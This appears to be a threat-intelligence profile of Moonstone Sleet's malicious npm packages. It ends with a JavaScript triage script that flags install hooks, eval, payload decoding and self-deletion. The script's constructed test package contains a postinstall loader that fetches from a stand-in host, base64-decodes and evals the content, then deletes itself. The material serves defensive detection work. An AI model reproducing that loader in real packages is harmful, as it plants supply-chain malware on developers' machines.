Moonstone Sleet, a state-sponsored threat actor originating from North Korea, has emerged as a significant cybersecurity concern. The group publishes malicious npm and other code packages to popular developer repositories, a tactic that has become increasingly common. By poisoning code across the software supply chain, Moonstone Sleet and similar threat actors reach a broad attack surface with minimal effort. This method allows them to infiltrate systems undetected, leaving behind what appears to be harmless software while executing remote payloads.
Microsoft publicly recognized Moonstone Sleet's activities on May 28, 2024, in a blog post titled "Moonstone Sleet emerges as new North Korean threat actor with new bag of tricks," partially revealing their findings about the group's tactics. Other notable threat actors identified by Microsoft include Peach Sandstorm, Mint Sandstorm, Mabna Institute, Emerald Sleet, and the developing Storm-1877. These entities, like Moonstone Sleet, pose significant threats to digital security worldwide due to their sophisticated and evolving methods of attack.
The most recent activity linked to Moonstone Sleet was the publication of a package called "sass-notification" on August 27, 2024. This package uses obfuscated JavaScript to run scripts that download, decrypt, and execute remote payloads, subsequently removing traces of malicious activity. The widespread distribution and stealthy nature of these attacks underscore the critical need for heightened vigilance and robust cybersecurity measures across all sectors.
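As an added example (not code from Microsoft's report or from the package described above), the following static triage pass flags the traits this description lists in an npm package: install-time lifecycle hooks, evaluation of downloaded and decoded content, network fetching, and self-deletion. The indicator regexes, the in-memory package layout and the sample package contents are constructed assumptions; a hit means "inspect before installing", not a verdict.

```javascript
// Heuristic indicators of the behaviour described: obfuscated JS that fetches,
// decodes and executes remote content, then removes its own traces.
const INDICATORS = [
  { name: 'dynamic-eval',    re: /\b(eval|new\s+Function)\s*\(/ },
  { name: 'remote-fetch',    re: /\brequire\(['"](https?|net)['"]\)|\bfetch\s*\(/ },
  { name: 'child-process',   re: /\brequire\(['"]child_process['"]\)/ },
  { name: 'decode-payload',  re: /Buffer\.from\([^)]*,\s*['"](base64|hex)['"]\)|\bcreateDecipheriv\s*\(/ },
  { name: 'self-delete',     re: /\b(unlinkSync|rmSync|unlink)\s*\(/ },
  { name: 'hex-escapes',     re: /(\\x[0-9a-fA-F]{2}){8,}/ },          // heavily escaped strings
  { name: 'long-base64',     re: /['"][A-Za-z0-9+/=]{200,}['"]/ },      // embedded encoded blob
];
// Lifecycle scripts npm runs automatically at install time.
const HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// files: { "package.json": "<json>", "index.js": "<source>", ... } (assumed layout)
function triagePackage(files) {
  const findings = [];
  const pkg = JSON.parse(files['package.json'] || '{}');
  for (const hook of HOOKS) {
    if (pkg.scripts && pkg.scripts[hook]) {
      findings.push({ file: 'package.json', indicator: `lifecycle:${hook}`, detail: pkg.scripts[hook] });
    }
  }
  for (const [file, src] of Object.entries(files)) {
    if (!file.endsWith('.js')) continue;
    for (const { name, re } of INDICATORS) {
      if (re.test(src)) findings.push({ file, indicator: name });
    }
  }
  return findings;
}

// Constructed sample package, not the real one: a postinstall hook that downloads,
// base64-decodes and evals a payload, then deletes its own script file.
const SAMPLE = {
  'package.json': JSON.stringify({ name: 'constructed-example', version: '1.0.0',
                                   scripts: { postinstall: 'node setup.js' } }),
  'setup.js': [
    "const h = require('https'); const fs = require('fs');",
    "h.get('https://example.invalid/p', r => { let d = ''; r.on('data', c => d += c);",
    "  r.on('end', () => { eval(Buffer.from(d, 'base64').toString()); fs.unlinkSync(__filename); }); });",
  ].join('\n'),
  'index.js': "module.exports = function notify(msg) { console.log(msg); };",
};

const findings = triagePackage(SAMPLE);
console.log(`${findings.length} indicators`, findings);
```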
Description last updated: 2024-10-23T13:02:06.800Z